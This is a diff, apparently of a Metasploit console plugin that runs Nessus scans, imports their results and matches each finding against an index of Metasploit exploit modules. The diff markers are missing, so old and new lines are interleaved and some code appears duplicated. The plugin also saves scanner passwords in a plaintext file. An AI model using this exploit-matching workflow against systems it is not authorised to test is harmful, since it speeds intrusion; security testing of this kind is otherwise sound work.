framework.exploits.sort.each { |refname, mod|
case count
when 0
print("\b\b\b[|]")
count += 1
when 1
print("\b\b\b[/]")
count += 1
when 2
print("\b\b\b[-]")
count += 1
when 3
print("\b\b\b[\\]")
count =0
end
stuff = ""
o = nil
begin
o = mod.new
rescue ::Exception
end
stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
next if not o
o.references.map do |x|
if !(x.ctx_id == "URL")
if (x.ctx_id == "MSB")
stuff << "|#{x.ctx_val}"
else
stuff << "|#{x.ctx_id}-#{x.ctx_val}"
#need to add version line.
f.puts(Msf::Framework::RepoRevision)
framework.exploits.sort.each { |refname, mod|
case count
when 0
print("\b\b\b[|]")
count += 1
when 1
print("\b\b\b[/]")
count += 1
when 2
print("\b\b\b[-]")
count += 1
when 3
print("\b\b\b[\\]")
count =0
end
stuff = ""
o = nil
begin
o = mod.new
rescue ::Exception
end
stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
next if not o
o.references.map do |x|
if !(x.ctx_id == "URL")
if (x.ctx_id == "MSB")
stuff << "|#{x.ctx_val}"
else
stuff << "|#{x.ctx_id}-#{x.ctx_val}"
end
end
end
end
stuff << "\n"
f.puts(stuff)
}
stuff << "\n"
f.puts(stuff)
}
end
total = Time.now - start
print("\b\b\b[*]%clr")
print("\n")
print_status("It has taken : #{total} seconds to build the exploits search index")
end
def nessus_index
if File.exist?("#{Xindex}")
#check if it's version line matches current version.
@@ -79,7 +81,7 @@ module Msf
create_xindex
end
end
class ConsoleCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
@@ -126,11 +128,11 @@ module Msf
"nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit."
}
end
def cmd_nessus_index
Msf::Plugin::Nessus.nessus_index
end
def cmd_nessus_save(*args)
#if we are logged in, save session details to nessus.yaml
if args[0] == "-h"
@@ -138,15 +140,15 @@ module Msf
print_status(" nessus_save")
return
end
if args[0]
print_status("Usage: ")
print_status(" nessus_save")
return
end
group = "default"
if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
config = Hash.new
config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
@@ -154,15 +156,15 @@ module Msf
f.puts YAML.dump(config)
end
print_good("#{Nessus_yaml} created.")
else
print_error("Missing username/password/server/port - relogin and then try again.")
return
end
end
def cmd_nessus_report_exploits(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_summary <report id>")
@@ -172,20 +174,20 @@ module Msf
print_status("%redThis plugin is experimental%clr")
return
end
if ! nessus_verify_db
print_error("You need a database configured for this command.")
print_error("Connect to a db with \"db_connect\"")
print_error("Then import scan with nessus_report_get")
return
end
if ! nessus_verify_token
return
end
rid = nil
case args.length
when 1
rid = args[0]
@@ -195,12 +197,12 @@ module Msf
print_status("Parses your report and just shows you exploitable vulns.")
return
end
if check_scan(rid)
print_error("That scan is still running.")
return
end
#streaming parser ftw.
content = nil
content=@n.report_file_download(rid)
@@ -215,20 +217,20 @@ module Msf
parser.on_found_host = Proc.new { |host|
addr = host['addr'] || host['hname']
addr.gsub!(/[\n\r]/," or ") if addr
os = host['os']
os.gsub!(/[\n\r]/," or ") if os
hname = host['hname']
hname.gsub!(/[\n\r]/," or ") if hname
mac = host['mac']
mac.gsub!(/[\n\r]/," or ") if mac
host['ports'].each do |item|
next if item['port'] == 0
exp = []
msf = nil
nasl = item['nasl'].to_s
@@ -237,21 +239,21 @@ module Msf
name = item['svc_name']
severity = item['severity']
description = item['description']
cve = item['cve']
cve = item['cve']
bid = item['bid']
xref = item['xref']
msf = item['msf']
# find exploits based on the msf plugin name from the report output.
if msf
regex = Regexp.new(msf, true, 'n')
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
# find exploits based on CVE
if cve
cve.each do |c|
@@ -259,11 +261,11 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
#find exploits based on BID
if bid
bid.each do |c|
@@ -273,13 +275,13 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
#find exploits based on OSVDB entry
#find exploits based on MSB
if xref
xref.each do |c|
@@ -289,12 +291,12 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
end
nss = 'NSS-' + nasl
next if exp.empty?
print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n")
@@ -313,11 +315,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
if ! nessus_verify_token
return
end
case args.length
when 2
pid = args[0].to_i
@@ -328,30 +330,30 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
if check_policy(pid)
print_error("That policy does not exist.")
return
end
tgts = ""
framework.db.hosts(framework.db.workspace).each do |host|
tgts << host.address
tgts << ","
end
tgts.chop!
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace")
scan = @n.scan_new(pid, name, tgts)
if scan
print_status("Scan started. uid is #{scan}")
end
end
def cmd_nessus_logout
@token = nil
print_status("Logged out")
@@ -359,14 +361,14 @@ module Msf
print_good("#{Nessus_yaml} removed.")
return
end
def cmd_nessus_help(*args)
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Command',
'Help Text'
])
]
)
tbl << [ "Generic Commands", "" ]
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_connect", "Connect to a nessus server" ]
@@ -415,12 +417,13 @@ module Msf
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_policy_list", "List all polciies" ]
tbl << [ "nessus_policy_del", "Delete a policy" ]
puts "\n"
puts tbl.to_s + "\n"
print_status ""
print_status tbl.to_s
print_status ""
end
def cmd_nessus_server_feed(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_feed")
@@ -429,23 +432,22 @@ module Msf
print_status("Returns information about the feed type and server version.")
return
end
if nessus_verify_token
@feed, @version, @web_version = @n.feed
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Feed',
'Nessus Version',
'Nessus Web Version'
])
tbl << [@feed, @version, @web_version]
print_good("Nessus Status")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
end
def nessus_verify_token
if @token.nil? or @token == ''
ncusage
@@ -453,16 +455,16 @@ module Msf
end
true
end
def nessus_verify_db
if ! (framework.db and framework.db.active)
print_error("No database has been configured, please use db_create/db_connect first")
return false
end
true
end
def ncusage
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -480,9 +482,9 @@ module Msf
print_status("This only works after you have saved creds with nessus_save")
return
end
def cmd_nessus_connect(*args)
if ! args[0]
if File.exist?("#{Nessus_yaml}")
lconfig = YAML.load_file("#{Nessus_yaml}")
@@ -497,7 +499,7 @@ module Msf
return
end
end
if args[0] == "-h"
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -521,19 +523,19 @@ module Msf
print_status("know that nessus used a self signed cert and the risk that presents.")
return
end
if ! @token == ''
print_error("You are already authenticated. Call nessus_logout before authing again")
return
end
if(args.length == 0 or args[0].empty?)
ncusage
return
end
@user = @pass = @host = @port = @sslv = nil
case args.length
when 1,2
if args[0].include? "@"
@@ -548,7 +550,7 @@ module Msf
@port ||= '8834'
@sslv = args[1]
end
when 3,4,5
ncusage
return
@@ -556,12 +558,12 @@ module Msf
ncusage
return
end
if /\/\//.match(@host)
ncusage
return
end
if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok")
print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker")
print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus")
@@ -569,36 +571,34 @@ module Msf
print_error(" as an additional parameter to this command.")
return
end
if ! @user
print_good("Username:")
$stdout.flush
@user = gets
@user.chomp!
end
if ! @pass
print_good("Password:")
$stdout.flush
@pass = gets
@pass.chomp!
end
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
ncusage
return
end
nessus_login
end
def nessus_login
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
print_status("You need to connect to a server first.")
ncusage
return
end
@url = "https://#{@host}:#{@port}/"
print_status("Connecting to #{@url} as #{@user}")
@n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass)
@@ -610,9 +610,9 @@ module Msf
return
end
end
def cmd_nessus_report_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_list")
@@ -621,35 +621,34 @@ module Msf
print_status("Generates a list of all reports visable to your user.")
return
end
if ! nessus_verify_token
return
end
list=@n.report_list_hash
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'ID',
'Name',
'Status',
'Date'
])
list.each {|report|
t = Time.at(report['timestamp'].to_i)
tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus Report List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get a list of hosts from the report: nessus_report_hosts <report id>")
end
def check_scan(*args)
case args.length
when 1
rid = args[0]
@@ -657,7 +656,7 @@ module Msf
print_error("No Report ID Supplied")
return
end
scans = @n.scan_list_hash
scans.each {|scan|
if scan['id'] == rid
@@ -666,9 +665,9 @@ module Msf
}
return false
end
def cmd_nessus_report_get(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_get <report id>")
@@ -680,24 +679,24 @@ module Msf
print_status("Use: nessus_report_list to obtain a list of report id's")
return
end
if ! nessus_verify_token
return
end
if ! nessus_verify_db
return
end
if(args.length == 0 or args[0].empty? or args[0] == "-h")
print_status("Usage: ")
print_status(" nessus_report_get <report id> ")
print_status(" use nessus_report_list to list all available reports for importing")
return
end
rid = nil
case args.length
when 1
rid = args[0]
@@ -707,7 +706,7 @@ module Msf
print_status(" use nessus_report_list to list all available reports for importing")
return
end
if check_scan(rid)
print_error("That scan is still running.")
return
@@ -720,41 +719,38 @@ module Msf
end
print_status("importing " + rid)
framework.db.import({:data => content}) do |type,data|
case type
case type
when :address
@count = 0
print("%bld%blu[*]%clr %bld#{data}%clr")
$stdout.flush
print_line("%bld%blu[*]%clr %bld#{data}%clr")
when :port
print("\b")
print_line("\b")
case @count
when 0
print("%bld%grn|")
print_line("%bld%grn|")
@count += 1
when 1
print("%bld%grn/")
print_line("%bld%grn/")
@count += 1
when 2
print("%bld%grn-")
print_line("%bld%grn-")
@count += 1
when 3
print("%bld%grn/")
print_line("%bld%grn/")
@count = 0
end
$stdout.flush
when :end
print("\b Done!%clr\n")
$stdout.flush
when :os
print_line("\b Done!%clr\n")
when :os
data.gsub!(/[\n\r]/," or ") if data
print(" #{data} ")
end
print_line(" #{data} ")
end
end
print_good("Done")
end
def cmd_nessus_scan_status(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_status")
@@ -763,11 +759,11 @@ module Msf
print_status("Returns a list of information about currently running scans.")
return
end
if ! nessus_verify_token
return
end
list=@n.scan_list_hash
if list.empty?
print_status("No Scans Running.")
@@ -776,10 +772,9 @@ module Msf
print_status(" Create a scan: nessus_scan_new <policy id> <scan name> <target(s)>")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Scan ID',
'Name',
'Owner',
@@ -788,22 +783,22 @@ module Msf
'Current Hosts',
'Total Hosts'
])
list.each {|scan|
t = Time.at(scan['start'].to_i)
tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ]
}
print_good("Running Scans")
puts "\n"
puts tbl.to_s + "\n"
puts "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
print_good(" Pause a nessus scan : nessus_scan_pause <scanid>")
end
def cmd_nessus_template_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_template_list")
@@ -812,13 +807,13 @@ module Msf
print_status("Returns a list of information about the server templates..")
return
end
if ! nessus_verify_token
return
end
list=@n.template_list_hash
if list.empty?
print_status("No Templates Created.")
print_status("You can:")
@@ -826,30 +821,29 @@ module Msf
print_status(" Create a template: nessus_template_new <policy id> <scan name> <target(s)>")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Template ID',
'Policy ID',
'Name',
'Owner',
'Target'
])
list.each {|template|
tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ]
}
print_good("Templates")
puts "\n"
puts tbl.to_s + "\n"
puts "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
end
def cmd_nessus_user_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_list")
@@ -858,36 +852,35 @@ module Msf
print_status("Returns a list of the users on the Nessus server and their access level.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_status("Your Nessus user is not an admin")
end
list=@n.users_list
print_good("There are #{list.length} users")
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Is Admin?',
'Last Login'
])
list.each {|user|
t = Time.at(user['lastlogin'].to_i)
tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus users")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_server_status(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_status")
@@ -900,19 +893,18 @@ module Msf
if ! nessus_verify_token
return
end
#Check if we are an admin
if ! @n.is_admin
print_status("You need to be an admin for this.")
return
end
#Versions
cmd_nessus_server_feed
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Users',
'Policies',
'Running Scans',
@@ -922,19 +914,19 @@ module Msf
#Count how many users the server has.
list=@n.users_list
users = list.length
#Count how many policies
list=@n.policy_list_hash
policies = list.length
#Count how many running scans
list=@n.scan_list_uids
scans = list.length
#Count how many reports are available
list=@n.report_list_hash
reports = list.length
#Count how many plugins
list=@n.plugins_list
total = Array.new
@@ -943,12 +935,12 @@ module Msf
}
plugins = total.sum
tbl << [users, policies, scans, reports, plugins]
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_plugin_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_list")
@@ -957,14 +949,13 @@ module Msf
print_status("Returns a list of the plugins on the server per family.")
return
end
if ! nessus_verify_token
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Family Name',
'Total Plugins'
])
@@ -978,13 +969,13 @@ module Msf
tbl << [ '', '']
tbl << [ 'Total Plugins', plugins ]
print_good("Plugins By Family")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("List plugins for a family : nessus_plugin_family <family name>")
end
def check_policy(*args)
case args.length
when 1
pid = args[0]
@@ -992,7 +983,7 @@ module Msf
print_error("No Policy ID supplied.")
return
end
pol = @n.policy_list_hash
pol.each {|p|
if p['id'].to_i == pid
@@ -1001,9 +992,9 @@ module Msf
}
return true
end
def cmd_nessus_scan_new(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_new <policy id> <scan name> <targets>")
@@ -1013,11 +1004,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
if ! nessus_verify_token
return
end
case args.length
when 3
pid = args[0].to_i
@@ -1029,23 +1020,23 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
if check_policy(pid)
print_error("That policy does not exist.")
return
end
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}")
scan = @n.scan_new(pid, name, tgts)
if scan
print_status("Scan started. uid is #{scan}")
end
end
def cmd_nessus_scan_pause(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause <scan id>")
@@ -1055,11 +1046,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1069,14 +1060,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
pause = @n.scan_pause(sid)
print_status("#{sid} has been paused")
end
def cmd_nessus_scan_resume(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume <scan id>")
@@ -1086,11 +1077,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1100,14 +1091,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
resume = @n.scan_resume(sid)
print_status("#{sid} has been resumed")
end
def cmd_nessus_report_hosts(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_hosts <report id>")
@@ -1117,11 +1108,11 @@ module Msf
print_status("use nessus_report_list to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
rid = args[0]
@@ -1131,10 +1122,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Hostname',
'Severity',
'Sev 0',
@@ -1149,14 +1139,14 @@ module Msf
tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ]
}
print_good("Report Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get information from a particular host: nessus_report_host_ports <hostname> <report id>")
end
def cmd_nessus_report_host_ports(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_ports <hostname> <report id>")
@@ -1165,11 +1155,11 @@ module Msf
print_status("Returns all the ports associated with a host and details about their vulnerabilities")
print_status("use nessus_report_hosts to list all available hosts for a report")
end
if ! nessus_verify_token
return
end
case args.length
when 2
host = args[0]
@@ -1180,10 +1170,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Port',
'Protocol',
'Severity',
@@ -1198,14 +1187,14 @@ module Msf
tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ]
}
print_good("Host Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>")
end
def cmd_nessus_report_host_detail(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_detail <hostname> <port> <protocol> <report id>")
@@ -1215,11 +1204,11 @@ module Msf
print_status("use nessus_report_host_ports to list all available ports for a host")
return
end
if ! nessus_verify_token
return
end
case args.length
when 4
host = args[0]
@@ -1232,10 +1221,9 @@ module Msf
print_status(" use nessus_report_host_ports to list all available ports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Port',
'Severity',
'PluginID',
@@ -1248,15 +1236,25 @@ module Msf
])
details=@n.report_host_port_details(rid, host, port, prot)
details.each {|detail|
tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ]
tbl << [
detail['port'],
detail['severity'],
detail['pluginID'],
detail['pluginName'],
detail['cvss_base_score'] || 'none',
detail['exploit_available'] || '.',
detail['cve'] || '.',
detail['risk_factor'] || '.',
detail['cvss_vector'] || '.'
]
}
print_good("Port Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_scan_pause_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause_all")
@@ -1266,18 +1264,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_pause_all
print_status("All scans have been paused")
end
def cmd_nessus_scan_stop(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop <scan id>")
@@ -1287,11 +1285,11 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1301,14 +1299,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
pause = @n.scan_stop(sid)
print_status("#{sid} has been stopped")
end
def cmd_nessus_scan_stop_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop_all")
@@ -1318,18 +1316,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_stop_all
print_status("All scans have been stopped")
end
def cmd_nessus_scan_resume_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume_all")
@@ -1339,18 +1337,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_resume_all
print_status("All scans have been resumed")
end
def cmd_nessus_user_add(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_add <username> <password>")
@@ -1360,16 +1358,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 2
user = args[0]
@@ -1380,7 +1378,7 @@ module Msf
print_status(" Only adds non admin users")
return
end
u = @n.users_list
u.each { |stuff|
if stuff['name'] == user
@@ -1396,9 +1394,9 @@ module Msf
print_error("#{user} was not added")
end
end
def cmd_nessus_user_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_del <username>")
@@ -1408,16 +1406,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
user = args[0]
@@ -1427,7 +1425,7 @@ module Msf
print_status(" Only dels non admin users")
return
end
del = @n.user_del(user)
status = del.root.elements['status'].text
if status == "OK"
@@ -1436,9 +1434,9 @@ module Msf
print_error("#{user} was not deleted")
end
end
def cmd_nessus_user_passwd(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_passwd <username> <password>")
@@ -1448,16 +1446,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 2
user = args[0]
@@ -1468,7 +1466,7 @@ module Msf
print_status(" User list from nessus_user_list")
return
end
pass = @n.user_pass(user,pass)
status = pass.root.elements['status'].text
if status == "OK"
@@ -1477,9 +1475,9 @@ module Msf
print_error("#{user}'s password has not been changed")
end
end
def cmd_nessus_admin(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_admin")
@@ -1489,20 +1487,20 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
else
print_good("Your Nessus user is an admin")
end
end
def cmd_nessus_plugin_family(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_family <plugin family name>")
@@ -1512,11 +1510,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
fam = args[0]
@@ -1526,27 +1524,26 @@ module Msf
print_status(" list all plugins from a Family from nessus_plugin_list")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Plugin ID',
'Plugin Name',
'Plugin File Name'
])
family = @n.plugin_family(fam)
family.each {|plugin|
tbl << [ plugin['id'], plugin['name'], plugin['filename'] ]
}
print_good("#{fam} Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_policy_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_list")
@@ -1555,14 +1552,13 @@ module Msf
print_status("Lists all policies on the server")
return
end
if ! nessus_verify_token
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'ID',
'Name',
'Comments'
@@ -1572,12 +1568,12 @@ module Msf
tbl << [ policy['id'], policy['name'], policy['comments'] ]
}
print_good("Nessus Policy List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_policy_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_del <policy ID>")
@@ -1587,16 +1583,16 @@ module Msf
print_status("use nessus_policy_list to list all policies")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
pid = args[0]
@@ -1606,9 +1602,8 @@ module Msf
print_status(" nessus_policy_list to find the id.")
return
end
print_error("Are you sure you want to delete #{pid} ?")
$stdout.flush
answer = gets
answer.chomp!
if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes"
@@ -1623,9 +1618,9 @@ module Msf
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_plugin_details(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_details <plugin file name>")
@@ -1635,11 +1630,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
pname = args[0]
@@ -1649,14 +1644,13 @@ module Msf
print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'',
''
])
entry = @n.plugin_detail(pname)
print_good("Plugin Details for #{entry['name']}")
tbl << [ "Plugin ID", entry['id'] ]
@@ -1673,12 +1667,12 @@ module Msf
tbl << [ "Solution", entry['solution'] ]
tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ]
tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ]
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_report_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_del <reportname>")
@@ -1688,16 +1682,16 @@ module Msf
print_status("use nessus_report_list to list all reports")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
rid = args[0]
@@ -1707,9 +1701,8 @@ module Msf
print_status(" nessus_report_list to find the id.")
return
end
print_error("Are you sure you want to delete #{rid} ?")
$stdout.flush
answer = gets
answer.chomp!
if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes")
@@ -1723,12 +1716,12 @@ module Msf
else
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_server_prefs(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_prefs")
@@ -1737,19 +1730,18 @@ module Msf
print_status("Returns a long list of server prefs.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Value'
])
@@ -1758,13 +1750,13 @@ module Msf
tbl << [ pref['name'], pref['value'] ]
}
print_good("Nessus Server Pref List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_plugin_prefs(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_prefs")
@@ -1773,19 +1765,18 @@ module Msf
print_status("Returns a long list of plugin prefs.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Value',
'Type'
@@ -1795,11 +1786,11 @@ module Msf
tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ]
}
print_good("Nessus Plugins Pref List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
end
def initialize(framework, opts)
super
+34 -34
@@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin
end
end
#
# Nexpose vuln lookup
#
def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
title = vulndef.attributes['title']
pciSeverity = vulndef.attributes['pciSeverity']
cvss_score = vulndef.attributes['cvssScore']
cvss_vector = vulndef.attributes['cvssVector']
vulndef.elements['references'].elements.each('reference') do |ref|
if ref.attributes['source'] == 'BID'
refs[ 'BID-' + ref.text ] = true
elsif ref.attributes['source'] == 'CVE'
# ref.text is CVE-$ID
refs[ ref.text ] = true
elsif ref.attributes['source'] == 'MS'
refs[ 'MSB-MS-' + ref.text ] = true
end
end
refs[ 'NEXPOSE-' + vid.downcase ] = true
vuln = framework.db.find_or_create_vuln(
#
# Nexpose vuln lookup
#
def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
